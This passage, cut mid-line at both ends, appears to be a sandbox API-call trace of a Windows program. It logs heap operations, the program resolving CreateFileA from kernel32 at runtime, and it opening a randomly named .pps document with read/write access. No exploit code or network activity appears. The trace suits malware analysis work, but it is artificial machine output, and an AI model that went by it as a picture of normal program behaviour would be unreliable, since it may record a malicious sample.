HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0179.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.188] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.191] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba000 [0179.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba000, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0179.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.191] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0179.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0179.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba000, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0179.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.192] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0179.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0179.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0179.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5e) returned 0x9a5d10 [0179.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", cchWideChar=94, lpMultiByteStr=0x9a5d10, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", lpUsedDefaultChar=0x0) returned 94 [0179.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0179.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.193] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\iznb7dzlokqso_3s.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=94, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0179.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xbc) returned 0x9c3478 [0179.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=94, lpWideCharStr=0x9c3478, cchWideChar=94 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps") returned 94 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.196] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.197] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0179.197] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 